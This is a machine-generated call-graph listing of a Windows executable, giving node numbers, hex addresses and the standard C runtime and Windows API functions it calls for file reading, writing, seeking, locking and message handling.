87291->87266 87291->87272 87291->87287 87292 41b2b4 WideCharToMultiByte 87292->87291 87294 41b2e5 WriteFile 87292->87294 87293 420955 58 API calls __fassign 87293->87296 87294->87264 87295 41b30c 87294->87295 87295->87264 87295->87291 87295->87296 87297 4221f0 WriteConsoleW CreateFileW __write_nolock 87295->87297 87298 41b339 WriteFile 87295->87298 87296->87288 87296->87291 87296->87292 87296->87293 87296->87295 87297->87295 87298->87264 87298->87295 87299->87198 87300->87210 87301->87202 87302->87206 87303->87210 87304->87214 87305->87213 87306->87210 87310 414910 __getstream 87307->87310 87308 414923 87363 417f77 46 API calls __getptd_noexit 87308->87363 87310->87308 87312 414951 87310->87312 87311 414928 87364 417f25 10 API calls __controlfp_s 87311->87364 87326 41d4d1 87312->87326 87315 414956 87316 41496a 87315->87316 87317 41495d 87315->87317 87319 414992 87316->87319 87320 414972 87316->87320 87365 417f77 46 API calls __getptd_noexit 87317->87365 87343 41d218 87319->87343 87366 417f77 46 API calls __getptd_noexit 87320->87366 87321 414933 @_EH4_CallFilterFunc@8 __getstream 87321->87094 87327 41d4dd __getstream 87326->87327 87328 4182cb __lock 46 API calls 87327->87328 87335 41d4eb 87328->87335 87329 41d567 87330 416b04 __malloc_crt 46 API calls 87329->87330 87332 41d56e 87330->87332 87334 41d57c InitializeCriticalSectionAndSpinCount 87332->87334 87341 41d560 87332->87341 87333 41d5f0 __getstream 87333->87315 87336 41d59c 87334->87336 87337 41d5af EnterCriticalSection 87334->87337 87335->87329 87338 418209 __mtinitlocknum 46 API calls 87335->87338 87335->87341 87371 4154b2 47 API calls __lock 87335->87371 87372 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87335->87372 87340 413748 _free 46 API calls 87336->87340 87337->87341 87338->87335 87340->87341 87368 41d5fb 87341->87368 87344 41d23a 87343->87344 87345 41d255 87344->87345 87357 41d26c __wopenfile 87344->87357 87377 417f77 46 API calls __getptd_noexit 87345->87377 87346 41d421 87349 41d47a 87346->87349 87350 41d48c 87346->87350 87348 41d25a 87378 417f25 10 API calls __controlfp_s 87348->87378 87382 417f77 46 API calls __getptd_noexit 87349->87382 87374 422bf9 87350->87374 87354 41d47f 87383 417f25 10 API calls __controlfp_s 87354->87383 87355 41499d 87367 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87355->87367 87357->87346 87357->87349 87379 41341f 58 API calls 2 library calls 87357->87379 87359 41d41a 87359->87346 87380 41341f 58 API calls 2 library calls 87359->87380 87361 41d439 87361->87346 87381 41341f 58 API calls 2 library calls 87361->87381 87363->87311 87364->87321 87365->87321 87366->87321 87367->87321 87373 4181f2 LeaveCriticalSection 87368->87373 87370 41d602 87370->87333 87371->87335 87372->87335 87373->87370 87384 422b35 87374->87384 87376 422c14 87376->87355 87377->87348 87378->87355 87379->87359 87380->87361 87381->87346 87382->87354 87383->87355 87385 422b41 __getstream 87384->87385 87386 422b54 87385->87386 87388 422b8a 87385->87388 87387 417f77 __controlfp_s 46 API calls 87386->87387 87389 422b59 87387->87389 87390 422400 __tsopen_nolock 109 API calls 87388->87390 87391 417f25 __controlfp_s 10 API calls 87389->87391 87392 422ba4 87390->87392 87394 422b63 __getstream 87391->87394 87393 422bcb __wsopen_helper LeaveCriticalSection 87392->87393 87393->87394 87394->87376 87398 4150dd __getstream 87395->87398 87396 4150e9 87426 417f77 46 API calls __getptd_noexit 87396->87426 87398->87396 87399 41510f 87398->87399 87408 415471 87399->87408 87400 4150ee 87427 417f25 10 API calls __controlfp_s 87400->87427 87407 4150f9 __getstream 87407->87099 87409 415483 87408->87409 87410 4154a5 EnterCriticalSection 87408->87410 87409->87410 87411 41548b 87409->87411 87412 415117 87410->87412 87413 4182cb __lock 46 API calls 87411->87413 87414 415047 87412->87414 87413->87412 87415 415067 87414->87415 87416 415057 87414->87416 87421 415079 87415->87421 87429 414e4e 87415->87429 87477 417f77 46 API calls __getptd_noexit 87416->87477 87420 41505c 87428 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87420->87428 87446 41443c 87421->87446 87423 414139 __flsbuf 46 API calls 87424 4150b9 87423->87424 87452 41e1f4 87424->87452 87426->87400 87427->87407 87428->87407 87430 414e61 87429->87430 87431 414e79 87429->87431 87478 417f77 46 API calls __getptd_noexit 87430->87478 87433 414139 __flsbuf 46 API calls 87431->87433 87435 414e80 87433->87435 87434 414e66 87479 417f25 10 API calls __controlfp_s 87434->87479 87437 41e1f4 __write 51 API calls 87435->87437 87438 414e97 87437->87438 87439 414f09 87438->87439 87441 414ec9 87438->87441 87445 414e71 87438->87445 87480 417f77 46 API calls __getptd_noexit 87439->87480 87442 41e1f4 __write 51 API calls 87441->87442 87441->87445 87443 414f64 87442->87443 87444 41e1f4 __write 51 API calls 87443->87444 87443->87445 87444->87445 87445->87421 87447 414477 87446->87447 87448 414455 87446->87448 87447->87423 87448->87447 87449 414139 __flsbuf 46 API calls 87448->87449 87450 414470 87449->87450 87451 41b7b2 __write 77 API calls 87450->87451 87451->87447 87453 41e200 __getstream 87452->87453 87454 41e223 87453->87454 87455 41e208 87453->87455 87457 41e22f 87454->87457 87460 41e269 87454->87460 87491 417f8a 46 API calls __getptd_noexit 87455->87491 87493 417f8a 46 API calls __getptd_noexit 87457->87493 87458 41e20d 87492 417f77 46 API calls __getptd_noexit 87458->87492 87464 41ae56 ___lock_fhandle 48 API calls 87460->87464 87462 41e234 87494 417f77 46 API calls __getptd_noexit 87462->87494 87466 41e26f 87464->87466 87465 41e23c 87495 417f25 10 API calls __controlfp_s 87465->87495 87468 41e291 87466->87468 87469 41e27d 87466->87469 87496 417f77 46 API calls __getptd_noexit 87468->87496 87481 41e17f 87469->87481 87470 41e215 __getstream 87470->87420 87473 41e289 87498 41e2c0 LeaveCriticalSection __unlock_fhandle 87473->87498 87474 41e296 87497 417f8a 46 API calls __getptd_noexit 87474->87497 87477->87420 87478->87434 87479->87445 87480->87445 87482 41aded __lseeki64_nolock 46 API calls 87481->87482 87483 41e18e 87482->87483 87484 41e1a4 SetFilePointer 87483->87484 87485 41e194 87483->87485 87487 41e1c3 87484->87487 87488 41e1bb GetLastError 87484->87488 87486 417f77 __controlfp_s 46 API calls 87485->87486 87489 41e199 87486->87489 87487->87489 87490 417f9d __dosmaperr 46 API calls 87487->87490 87488->87487 87489->87473 87490->87489 87491->87458 87492->87470 87493->87462 87494->87465 87495->87470 87496->87474 87497->87473 87498->87470 87500 4149ea 87499->87500 87501 4149fe 87499->87501 87545 417f77 46 API calls __getptd_noexit 87500->87545 87504 41443c __flush 77 API calls 87501->87504 87513 4149fa 87501->87513 87503 4149ef 87546 417f25 10 API calls __controlfp_s 87503->87546 87506 414a0a 87504->87506 87518 41d8c2 87506->87518 87509 414139 __flsbuf 46 API calls 87510 414a18 87509->87510 87522 41d7fe 87510->87522 87512 414a1e 87512->87513 87514 413748 _free 46 API calls 87512->87514 87517 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87513->87517 87514->87513 87515->87109 87516->87112 87517->87112 87519 414a12 87518->87519 87520 41d8d2 87518->87520 87519->87509 87520->87519 87521 413748 _free 46 API calls 87520->87521 87521->87519 87523 41d80a __getstream 87522->87523 87524 41d812 87523->87524 87525 41d82d 87523->87525 87562 417f8a 46 API calls __getptd_noexit 87524->87562 87527 41d839 87525->87527 87531 41d873 87525->87531 87564 417f8a 46 API calls __getptd_noexit 87527->87564 87529 41d817 87563 417f77 46 API calls __getptd_noexit 87529->87563 87530 41d83e 87565 417f77 46 API calls __getptd_noexit 87530->87565 87534 41ae56 ___lock_fhandle 48 API calls 87531->87534 87537 41d879 87534->87537 87535 41d81f __getstream 87535->87512 87536 41d846 87566 417f25 10 API calls __controlfp_s 87536->87566 87539 41d893 87537->87539 87540 41d887 87537->87540 87567 417f77 46 API calls __getptd_noexit 87539->87567 87547 41d762 87540->87547 87543 41d88d 87568 41d8ba LeaveCriticalSection __unlock_fhandle 87543->87568 87545->87503 87546->87513 87569 41aded 87547->87569 87549 41d7c8 87582 41ad67 47 API calls 2 library calls 87549->87582 87551 41d772 87551->87549 87552 41d7a6 87551->87552 87553 41aded __lseeki64_nolock 46 API calls 87551->87553 87552->87549 87554 41aded __lseeki64_nolock 46 API calls 87552->87554 87556 41d79d 87553->87556 87557 41d7b2 CloseHandle 87554->87557 87555 41d7d0 87561 41d7f2 87555->87561 87583 417f9d 46 API calls 3 library calls 87555->87583 87558 41aded __lseeki64_nolock 46 API calls 87556->87558 87557->87549 87559 41d7be GetLastError 87557->87559 87558->87552 87559->87549 87561->87543 87562->87529 87563->87535 87564->87530 87565->87536 87566->87535 87567->87543 87568->87535 87570 41ae12 87569->87570 87571 41adfa 87569->87571 87573 417f8a __read_nolock 46 API calls 87570->87573 87576 41ae51 87570->87576 87572 417f8a __read_nolock 46 API calls 87571->87572 87574 41adff 87572->87574 87575 41ae23 87573->87575 87577 417f77 __controlfp_s 46 API calls 87574->87577 87578 417f77 __controlfp_s 46 API calls 87575->87578 87576->87551 87579 41ae07 87577->87579 87580 41ae2b 87578->87580 87579->87551 87581 417f25 __controlfp_s 10 API calls 87580->87581 87581->87579 87582->87555 87583->87561 87585 414c82 __getstream 87584->87585 87586 414cc3 87585->87586 87587 414c96 __cftof2_l 87585->87587 87588 414cbb __getstream 87585->87588 87589 415471 __lock_file 47 API calls 87586->87589 87611 417f77 46 API calls __getptd_noexit 87587->87611 87588->87119 87590 414ccb 87589->87590 87597 414aba 87590->87597 87592 414cb0 87612 417f25 10 API calls __controlfp_s 87592->87612 87598 414af2 87597->87598 87601 414ad8 __cftof2_l 87597->87601 87613 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87598->87613 87599 414ae2 87664 417f77 46 API calls __getptd_noexit 87599->87664 87601->87598 87601->87599 87604 414b2d 87601->87604 87604->87598 87606 414139 __flsbuf 46 API calls 87604->87606 87610 414c38 __cftof2_l 87604->87610 87614 41dfcc 87604->87614 87644 41d8f3 87604->87644 87666 41e0c2 46 API calls 3 library calls 87604->87666 87606->87604 87609 414ae7 87665 417f25 10 API calls __controlfp_s 87609->87665 87667 417f77 46 API calls __getptd_noexit 87610->87667 87611->87592 87612->87588 87613->87588 87615 41dfd8 __getstream 87614->87615 87616 41dfe0 87615->87616 87617 41dffb 87615->87617 87737 417f8a 46 API calls __getptd_noexit 87616->87737 87618 41e007 87617->87618 87623 41e041 87617->87623 87739 417f8a 46 API calls __getptd_noexit 87618->87739 87621 41dfe5 87738 417f77 46 API calls __getptd_noexit 87621->87738 87622 41e00c 87740 417f77 46 API calls __getptd_noexit 87622->87740 87626 41e063 87623->87626 87627 41e04e 87623->87627 87629 41ae56 ___lock_fhandle 48 API calls 87626->87629 87742 417f8a 46 API calls __getptd_noexit 87627->87742 87628 41dfed __getstream 87628->87604 87632 41e069 87629->87632 87630 41e014 87741 417f25 10 API calls __controlfp_s 87630->87741 87634 41e077 87632->87634 87635 41e08b 87632->87635 87633 41e053 87743 417f77 46 API calls __getptd_noexit 87633->87743 87668 41da15 87634->87668 87744 417f77 46 API calls __getptd_noexit 87635->87744 87640 41e090 87745 417f8a 46 API calls __getptd_noexit 87640->87745 87641 41e083 87746 41e0ba LeaveCriticalSection __unlock_fhandle 87641->87746 87645 41d900 87644->87645 87649 41d915 87644->87649 87747 417f77 46 API calls __getptd_noexit 87645->87747 87647 41d905 87748 417f25 10 API calls __controlfp_s 87647->87748 87650 41d94a 87649->87650 87651 420603 __getbuf 46 API calls 87649->87651 87657 41d910 87649->87657 87652 414139 __flsbuf 46 API calls 87650->87652 87651->87650 87653 41d95e 87652->87653 87654 41dfcc __read 59 API calls 87653->87654 87655 41d965 87654->87655 87656 414139 __flsbuf 46 API calls 87655->87656 87655->87657 87658 41d988 87656->87658 87657->87604 87658->87657 87659 414139 __flsbuf 46 API calls 87658->87659 87660 41d994 87659->87660 87660->87657 87661 414139 __flsbuf 46 API calls 87660->87661 87662 41d9a1 87661->87662 87663 414139 __flsbuf 46 API calls 87662->87663 87663->87657 87664->87609 87665->87598 87666->87604 87667->87609 87669 41da31 87668->87669 87670 41da4c 87668->87670 87672 417f8a __read_nolock 46 API calls 87669->87672 87671 41da5b 87670->87671 87673 41da7a 87670->87673 87674 417f8a __read_nolock 46 API calls 87671->87674 87675 41da36 87672->87675 87677 41da98 87673->87677 87692 41daac 87673->87692 87676 41da60 87674->87676 87678 417f77 __controlfp_s 46 API calls 87675->87678 87680 417f77 __controlfp_s 46 API calls 87676->87680 87681 417f8a __read_nolock 46 API calls 87677->87681 87688 41da3e 87678->87688 87679 41db02 87683 417f8a __read_nolock 46 API calls 87679->87683 87682 41da67 87680->87682 87684 41da9d 87681->87684 87685 417f25 __controlfp_s 10 API calls 87682->87685 87686 41db07 87683->87686 87687 417f77 __controlfp_s 46 API calls 87684->87687 87685->87688 87689 417f77 __controlfp_s 46 API calls 87686->87689 87690 41daa4 87687->87690 87688->87641 87689->87690 87694 417f25 __controlfp_s 10 API calls 87690->87694 87691 41dae1 87691->87679 87697 41daec ReadFile 87691->87697 87692->87679 87692->87688 87692->87691 87693 41db1b 87692->87693 87696 416b04 __malloc_crt 46 API calls 87693->87696 87694->87688 87698 41db31 87696->87698 87699 41dc17 87697->87699 87700 41df8f GetLastError 87697->87700 87703 41db59 87698->87703 87704 41db3b 87698->87704 87699->87700 87707 41dc2b 87699->87707 87701 41de16 87700->87701 87702 41df9c 87700->87702 87711 417f9d __dosmaperr 46 API calls 87701->87711 87716 41dd9b 87701->87716 87705 417f77 __controlfp_s 46 API calls 87702->87705 87708 420494 __lseeki64_nolock 48 API calls 87703->87708 87706 417f77 __controlfp_s 46 API calls 87704->87706 87709 41dfa1 87705->87709 87710 41db40 87706->87710 87707->87716 87717 41dc47 87707->87717 87720 41de5b 87707->87720 87712 41db67 87708->87712 87713 417f8a __read_nolock 46 API calls 87709->87713 87714 417f8a __read_nolock 46 API calls 87710->87714 87711->87716 87712->87697 87713->87716 87714->87688 87715 413748 _free 46 API calls 87715->87688 87716->87688 87716->87715 87718 41dcab ReadFile 87717->87718 87725 41dd28 87717->87725 87723 41dcc9 GetLastError 87718->87723 87728 41dcd3 87718->87728 87719 41ded0 ReadFile 87721 41deef GetLastError 87719->87721 87729 41def9 87719->87729 87720->87716 87720->87719 87721->87720 87721->87729 87722 41ddec MultiByteToWideChar 87722->87716 87724 41de10 GetLastError 87722->87724 87723->87717 87723->87728 87724->87701 87725->87716 87726 41dda3 87725->87726 87727 41dd96 87725->87727 87733 41dd60 87725->87733 87726->87733 87734 41ddda 87726->87734 87730 417f77 __controlfp_s 46 API calls 87727->87730 87728->87717 87731 420494 __lseeki64_nolock 48 API calls 87728->87731 87729->87720 87732 420494 __lseeki64_nolock 48 API calls 87729->87732 87730->87716 87731->87728 87732->87729 87733->87722 87735 420494 __lseeki64_nolock 48 API calls 87734->87735 87736 41dde9 87735->87736 87736->87722 87737->87621 87738->87628 87739->87622 87740->87630 87741->87628 87742->87633 87743->87630 87744->87640 87745->87641 87746->87628 87747->87647 87748->87657 87752 4148b3 GetSystemTimeAsFileTime __aulldiv 87749->87752 87751 442c6b 87751->87122 87752->87751 87753->87129 87754->87135 87755->87135 87760 45272f __tzset_nolock _wcscpy 87756->87760 87757 414d04 61 API calls __fread_nolock 87757->87760 87758 44afef GetSystemTimeAsFileTime 87758->87760 87759 4528a4 87759->87044 87759->87045 87760->87757 87760->87758 87760->87759 87761 4150d1 81 API calls _fseek 87760->87761 87761->87760 87763 44b1bc 87762->87763 87764 44b1ca 87762->87764 87765 4149c2 116 API calls 87763->87765 87766 44b1e1 87764->87766 87767 44b1d8 87764->87767 87768 4149c2 116 API calls 87764->87768 87765->87764 87797 4321a4 87766->87797 87767->87073 87770 44b2db 87768->87770 87770->87766 87772 44b2e9 87770->87772 87771 44b224 87773 44b253 87771->87773 87774 44b228 87771->87774 87775 44b2f6 87772->87775 87777 414a46 __fcloseall 82 API calls 87772->87777 87801 43213d 87773->87801 87779 414a46 __fcloseall 82 API calls 87774->87779 87783 44b235 87774->87783 87775->87073 87777->87775 87778 44b25a 87781 44b260 87778->87781 87782 44b289 87778->87782 87779->87783 87780 44b245 87780->87073 87785 44b26d 87781->87785 87787 414a46 __fcloseall 82 API calls 87781->87787 87811 44b0bf 87782->87811 87783->87780 87784 414a46 __fcloseall 82 API calls 87783->87784 87784->87780 87788 44b27d 87785->87788 87790 414a46 __fcloseall 82 API calls 87785->87790 87787->87785 87788->87073 87789 44b28f 87820 4320f8 87789->87820 87790->87788 87793 44b2a2 87795 44b2b2 87793->87795 87796 414a46 __fcloseall 82 API calls 87793->87796 87794 414a46 __fcloseall 82 API calls 87794->87793 87795->87073 87796->87795 87798 4321cb 87797->87798 87800 4321b4 __tzset_nolock _memmove 87797->87800 87799 414d04 __fread_nolock 61 API calls 87798->87799 87799->87800 87800->87771 87802 4135bb _malloc 46 API calls 87801->87802 87803 432150 87802->87803 87804 4135bb _malloc 46 API calls 87803->87804 87805 432162 87804->87805 87806 4135bb _malloc 46 API calls 87805->87806 87807 432174 87806->87807 87808 4320f8 46 API calls 87807->87808 87810 432189 87807->87810 87809 432198 87808->87809 87809->87778 87810->87778 87812 44b18e 87811->87812 87818 44b0da 87811->87818 87832 43206e 87812->87832 87814 442caf 61 API calls 87814->87818 87818->87812 87818->87814 87819 44b19d 87818->87819 87828 442d48 87818->87828 87836 44b040 61 API calls 87818->87836 87819->87789 87821 432109 87820->87821 87826 43210f 87820->87826 87822 413748 _free 46 API calls 87821->87822 87822->87826 87823 413748 _free 46 API calls 87825 432122 87823->87825 87824 432135 87824->87793 87824->87794 87825->87824 87827 413748 _free 46 API calls 87825->87827 87826->87823 87826->87825 87827->87824 87829 442dbd 87828->87829 87831 442d60 87828->87831 87829->87831 87837 4320a4 87829->87837 87831->87818 87833 432092 87832->87833 87834 43207f 87832->87834 87833->87789 87835 4142b6 79 API calls 87834->87835 87835->87833 87836->87818 87838 4320e6 87837->87838 87839 4320cf 87837->87839 87838->87829 87841 4142b6 87839->87841 87842 4142c2 __getstream 87841->87842 87843 4142f2 87842->87843 87844 4142da 87842->87844 87846 4142ea __getstream 87842->87846 87847 415471 __lock_file 47 API calls 87843->87847 87845 417f77 __controlfp_s 46 API calls 87844->87845 87848 4142df 87845->87848 87846->87838 87849 4142fa 87847->87849 87850 417f25 __controlfp_s 10 API calls 87848->87850 87851 41415f 77 API calls 87849->87851 87850->87846 87852 41430f 87851->87852 87853 414326 LeaveCriticalSection LeaveCriticalSection 87852->87853 87853->87846 87854->86985 87855->86985 87856->86985 87857->86976 87858->86985 87859->86985 87860->86990 87861->86998 87862->86999 87863->86999 87864->87004 87865->87013 87866->87007 87916 410160 87867->87916 87869 41012f GetFullPathNameW 87870 410147 moneypunct 87869->87870 87870->86827 87872 4102cb SHGetDesktopFolder 87871->87872 87875 410333 _wcsncpy 87871->87875 87873 4102e0 _wcsncpy 87872->87873 87872->87875 87874 41031c SHGetPathFromIDListW 87873->87874 87873->87875 87874->87875 87875->86831 87877 4101bb 87876->87877 87881 425f4a 87876->87881 87878 410160 52 API calls 87877->87878 87880 4101c7 87878->87880 87879 4114ab __wcsicoll 58 API calls 87879->87881 87920 410200 52 API calls 2 library calls 87880->87920 87881->87879 87885 425f6e 87881->87885 87883 4101d6 87921 410200 52 API calls 2 library calls 87883->87921 87885->86833 87886 4101e9 87886->86833 87888 40f760 128 API calls 87887->87888 87889 40f584 87888->87889 87890 429335 87889->87890 87891 40f58c 87889->87891 87894 4528bd 118 API calls 87890->87894 87892 40f598 87891->87892 87893 429358 87891->87893 87922 4033c0 113 API calls 7 library calls 87892->87922 87923 434034 86 API calls _wprintf 87893->87923 87897 42934b 87894->87897 87900 429373 87897->87900 87901 42934f 87897->87901 87898 429369 87898->87900 87899 40f5b4 87899->86830 87903 4115d7 52 API calls 87900->87903 87902 431e58 82 API calls 87901->87902 87902->87893 87915 4293c5 moneypunct 87903->87915 87904 42959c 87905 413748 _free 46 API calls 87904->87905 87906 4295a5 87905->87906 87907 431e58 82 API calls 87906->87907 87908 4295b1 87907->87908 87912 401b10 52 API calls 87912->87915 87915->87904 87915->87912 87924 444af8 52 API calls _memmove 87915->87924 87925 44c7dd 64 API calls 3 library calls 87915->87925 87926 44b41c 52 API calls 87915->87926 87927 402780 52 API calls 2 library calls 87915->87927 87928 4022d0 52 API calls moneypunct 87915->87928 87917 410167 _wcslen 87916->87917 87918 4115d7 52 API calls 87917->87918 87919 41017e _wcscpy 87918->87919 87919->87869 87920->87883 87921->87886 87922->87899 87923->87898 87924->87915 87925->87915 87926->87915 87927->87915 87928->87915 87930 402417 87929->87930 87934 402539 moneypunct 87929->87934 87931 4115d7 52 API calls 87930->87931 87930->87934 87932 402443 87931->87932 87933 4115d7 52 API calls 87932->87933 87936 4024b4 87933->87936 87934->86837 87936->87934 87958 402880 87936->87958 88000 4022d0 52 API calls moneypunct 87936->88000 87942 401566 87938->87942 87939 401794 88014 40e9a0 90 API calls 87939->88014 87942->87939 87943 40167a 87942->87943 87944 4010a0 52 API calls 87942->87944 87945 4017c0 87943->87945 88015 45e737 90 API calls 3 library calls 87943->88015 87944->87942 87945->86839 87947 40bc70 52 API calls 87946->87947 87956 40d451 87947->87956 87948 40d50f 88018 410600 52 API calls 87948->88018 87950 427c01 88019 45e737 90 API calls 3 library calls 87950->88019 87951 40e0a0 52 API calls 87951->87956 87953 401b10 52 API calls 87953->87956 87954 40d519 87954->86842 87956->87948 87956->87950 87956->87951 87956->87953 87956->87954 88016 40f310 53 API calls 87956->88016 88017 40d860 91 API calls 87956->88017 87959 4115d7 52 API calls 87958->87959 87960 4028b3 87959->87960 87961 4115d7 52 API calls 87960->87961 87999 4028c5 moneypunct _memmove 87961->87999 87964 427d62 87967 403350 52 API calls 87964->87967 87965 402bb6 88003 403060 53 API calls 87965->88003 87966 402aeb moneypunct 87970 42802b moneypunct 87966->87970 88002 402780 52 API calls 2 library calls 87966->88002 87974 427d6b 87967->87974 87969 402bca 87971 427f63 87969->87971 87972 402bd4 87969->87972 88009 460879 92 API calls 3 library calls 87971->88009 88004 402780 52 API calls 2 library calls 87972->88004 87973 403350 52 API calls 87973->87999 87980 427f2c 87974->87980 88007 403020 52 API calls _memmove 87974->88007 87978 402bdf 87978->87936 87979 427fd5 88011 460879 92 API calls 3 library calls 87979->88011 88008 460879 92 API calls 3 library calls 87980->88008 87981 402780 52 API calls 87981->87999 87985 427f48 87997 402b1e moneypunct 87985->87997 87986 4013a0 52 API calls 87986->87999 87987 427fe4 88012 402780 52 API calls 2 library calls 87987->88012 87988 427fa5 88010 402780 52 API calls 2 library calls 87988->88010 87989 402f00 52 API calls 87989->87999 87990 428000 88013 460879 92 API calls 3 library calls 87990->88013 87992 4026f0 52 API calls 87995 402a85 CharUpperBuffW 87992->87995 87995->87999 87997->87936 87998 4115d7 52 API calls 87998->87999 87999->87964 87999->87965 87999->87966 87999->87973 87999->87979 87999->87980 87999->87981 87999->87986 87999->87988 87999->87989 87999->87990 87999->87992 87999->87998 88001 4031b0 63 API calls 87999->88001 88005 402f80 92 API calls _memmove 87999->88005 88006 402280 52 API calls 87999->88006 88000->87936 88001->87999 88002->87997 88003->87969 88004->87978 88005->87999 88006->87999 88007->87974 88008->87985 88009->87985 88010->87997 88011->87987 88012->87985 88013->87997 88014->87943 88015->87945 88016->87956 88017->87956 88018->87954 88019->87954 88020->86855 88021->86856 88023 4091c6 88022->88023 88024 42c5fe 88022->88024 88023->86917 88024->88023 88025 40bc70 52 API calls 88024->88025 88026 42c64e InterlockedIncrement 88025->88026 88027 42c665 88026->88027 88033 42c697 88026->88033 88030 42c672 InterlockedDecrement Sleep InterlockedIncrement 88027->88030 88027->88033 88028 42c737 InterlockedDecrement 88029 42c74a 88028->88029 88032 408f40 VariantClear 88029->88032 88030->88027 88030->88033 88031 42c731 88031->88028 88035 42c752 88032->88035 88033->88028 88033->88031 88315 408e80 VariantClear 88033->88315 88325 410c60 VariantClear moneypunct 88035->88325 88036 42c6cf 88316 45340c 88036->88316 88039 42c6db 88040 402160 52 API calls 88039->88040 88041 42c6e5 88040->88041 88042 45340c 85 API calls 88041->88042 88043 42c6f1 88042->88043 88322 40d200 52 API calls 2 library calls 88043->88322 88045 42c6fb 88323 465124 53 API calls 88045->88323 88047 42c715 88048 42c76a 88047->88048 88049 42c719 88047->88049 88050 401b10 52 API calls 88048->88050 88324 46fe32 VariantClear 88049->88324 88052 42c77e 88050->88052 88053 401980 53 API calls 88052->88053 88081 40afc4 88080->88081 88082 40b156 88080->88082 88083 40afd5 88081->88083 88084 42d1e3 88081->88084 88389 45e737 90 API calls 3 library calls 88082->88389 88087 40a780 259 API calls 88083->88087 88105 40b11a moneypunct 88083->88105 88390 45e737 90 API calls 3 library calls 88084->88390 88090 40b00a 88087->88090 88088 42d1f8 88093 408f40 VariantClear 88088->88093 88089 40b143 88089->86917 88090->88088 88094 40b012 88090->88094 88092 42d4db 88092->88092 88093->88089 88095 40b04a 88094->88095 88097 42d231 VariantClear 88094->88097 88098 40b094 moneypunct 88094->88098 88099 40b05c moneypunct 88095->88099 88391 40e270 VariantClear moneypunct 88095->88391 88096 40b108 88096->88105 88392 40e270 VariantClear moneypunct 88096->88392 88097->88099 88098->88096 88102 42d425 moneypunct 88098->88102 88099->88098 88103 4115d7 52 API calls 88099->88103 88100 42d45a VariantClear 88100->88105 88102->88100 88102->88105 88103->88098 88105->88089 88393 45e737 90 API calls 3 library calls 88105->88393 88107 408fff 88106->88107 88119 40900d 88106->88119 88394 403ea0 52 API calls __cinit 88107->88394 88110 42c3f6 88398 45e737 90 API calls 3 library calls 88110->88398 88112 40a780 259 API calls 88112->88119 88113 42c44a 88400 45e737 90 API calls 3 library calls 88113->88400 88114 42c47b 88401 451b42 61 API calls 88114->88401 88117 42c564 88122 408f40 VariantClear 88117->88122 88119->88110 88119->88112 88119->88113 88119->88114 88119->88117 88120 42c4cb 88119->88120 88124 42c548 88119->88124 88125 409112 88119->88125 88128 4090df 88119->88128 88130 42c528 88119->88130 88132 4090ea 88119->88132 88140 4090f2 moneypunct 88119->88140 88397 4534e3 52 API calls 88119->88397 88399 40c4e0 259 API calls 88119->88399 88403 47faae 298 API calls 88120->88403 88122->88140 88123 42c4da 88123->88140 88404 45e737 90 API calls 3 library calls 88123->88404 88406 45e737 90 API calls 3 library calls 88124->88406 88125->88124 88135 40912b 88125->88135 88126 42c491 88126->88140 88402 45e737 90 API calls 3 library calls 88126->88402 88128->88132 88395 408e80 VariantClear 88128->88395 88405 45e737 90 API calls 3 library calls 88130->88405 88136 408f40 VariantClear 88132->88136 88135->88140 88396 403e10 53 API calls 88135->88396 88136->88140 88138 40914b 88139 408f40 VariantClear 88138->88139 88139->88140 88140->86917 88407 408d90 88141->88407 88143 429778 88436 410c60 VariantClear moneypunct 88143->88436 88145 408cf9 88145->88143 88147 42976c 88145->88147 88149 408d2d 88145->88149 88146 429780 88435 45e737 90 API calls 3 library calls 88147->88435 88423 403d10 88149->88423 88152 408d71 moneypunct 88152->86917 88153 408f40 VariantClear 88154 408d45 moneypunct 88153->88154 88154->88152 88154->88153 88156 425c87 88155->88156 88157 40d15f 88155->88157 88158 425cc7 88156->88158 88159 425ca1 TranslateAcceleratorW 88156->88159 88157->86917 88159->88157 88161 42602f 88160->88161 88162 40d17f 88160->88162 88161->86917 88163 40d18c 88162->88163 88164 42608e IsDialogMessageW 88162->88164 88976 430c46 GetClassLongW 88162->88976 88163->86917 88164->88162 88164->88163 88167 4096c6 _wcslen 88166->88167 88168 4115d7 52 API calls 88167->88168 88230 40a70c moneypunct _memmove 88167->88230 88169 4096fa _memmove 88168->88169 88170 4115d7 52 API calls 88169->88170 88172 40971b 88170->88172 88171 4013a0 52 API calls 88173 4297aa 88171->88173 88174 409749 CharUpperBuffW 88172->88174 88178 40976a moneypunct 88172->88178 88172->88230 88175 4115d7 52 API calls 88173->88175 88174->88178 88217 4297d1 _memmove 88175->88217 88226 4097e5 moneypunct 88178->88226 88978 47dcbb 261 API calls 88178->88978 88179 408f40 VariantClear 88180 42ae92 88179->88180 89006 410c60 VariantClear moneypunct 88180->89006 88182 42aea4 88183 409aa2 88185 4115d7 52 API calls 88183->88185 88190 409afe 88183->88190 88183->88217 88184 40a689 88187 4115d7 52 API calls 88184->88187 88185->88190 88186 4115d7 52 API calls 88186->88226 88204 40a6af moneypunct _memmove 88187->88204 88188 409b2a 88192 429dbe 88188->88192 88253 409b4d moneypunct _memmove 88188->88253 88985 40b400 VariantClear VariantClear moneypunct 88188->88985 88189 40c2c0 52 API calls 88189->88226 88190->88188 88191 4115d7 52 API calls 88190->88191 88193 429d31 88191->88193 88194 429dd3 88192->88194 88986 40b400 VariantClear VariantClear moneypunct 88192->88986 88198 429d42 88193->88198 88982 44a801 52 API calls 88193->88982 88194->88253 88987 40e1c0 VariantClear moneypunct 88194->88987 88195 429a46 VariantClear 88195->88226 88196 409fd2 88201 40a045 88196->88201 88255 42a3f5 88196->88255 88208 40e0a0 52 API calls 88198->88208 88206 4115d7 52 API calls 88201->88206 88202 408f40 VariantClear 88202->88226 88211 4115d7 52 API calls 88204->88211 88212 40a04c 88206->88212 88213 429d57 88208->88213 88209 42a42f 88992 45e737 90 API calls 3 library calls 88209->88992 88211->88230 88215 40a0a7 88212->88215 88219 4091e0 384 API calls 88212->88219 88983 453443 52 API calls 88213->88983 88214 40ba10 52 API calls 88214->88226 88238 40a0af 88215->88238 88993 40c790 VariantClear moneypunct 88215->88993 88216 4299d9 88220 408f40 VariantClear 88216->88220 89005 45e737 90 API calls 3 library calls 88217->89005 88219->88215 88225 4299e2 88220->88225 88221 429abd 88221->86917 88222 429d88 88984 453443 52 API calls 88222->88984 88980 410c60 VariantClear moneypunct 